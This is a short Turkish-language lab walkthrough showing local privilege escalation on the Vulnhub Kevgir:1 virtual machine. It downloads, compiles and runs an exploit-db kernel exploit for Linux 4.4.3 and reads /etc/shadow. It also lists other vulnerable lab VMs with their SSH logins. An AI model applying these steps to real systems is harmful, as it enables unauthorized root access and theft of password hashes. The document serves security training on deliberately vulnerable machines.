Yazıda kullanılan Kevgir:1 sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/kevgir-1,137/
Çekirdek sürümü 4.4.3 olan Linux işletim sistemine standart yetkilerle elde edilen erişimde standart bir kullanıcı (user) haklarına sahip olunduğu görülmektedir.
id
cat /etc/shadow
İşletim sistemi bilgileri aşağıdaki gibi elde edilebilir.
uname -a
cat /etc/issue
Linux Kernel 4.4.3’te kritik bir zafiyet bulunmaktadır. Bu zafiyeti istismar edecek kod exploit-db’den indirilerek hedef sisteme aktarılacak ve çalıştırılacaktır.
https://www.exploit-db.com/exploits/39166/
İndirilen dosya (39166.c) derlenir.
ls
gcc 39166.c -o hakyukseltme_derlenmis
ls
Sonrasında da zafiyetli sistemde çalıştırılır ve “root” yetkilerine erişim sağlanmış olur.
./hakyukseltme_derlenmis
id
head -5 /etc/shadow
Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:
- VulnOS 2: https://www.vulnhub.com/entry/vulnos-2,147/
- SSH (22) Kimlik Bilgileri: webmin / webmin1980
- Lord Of The Root: 1.0.1: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
- SSH (22) Kimlik Bilgileri: smeagol / MyPreciousR00t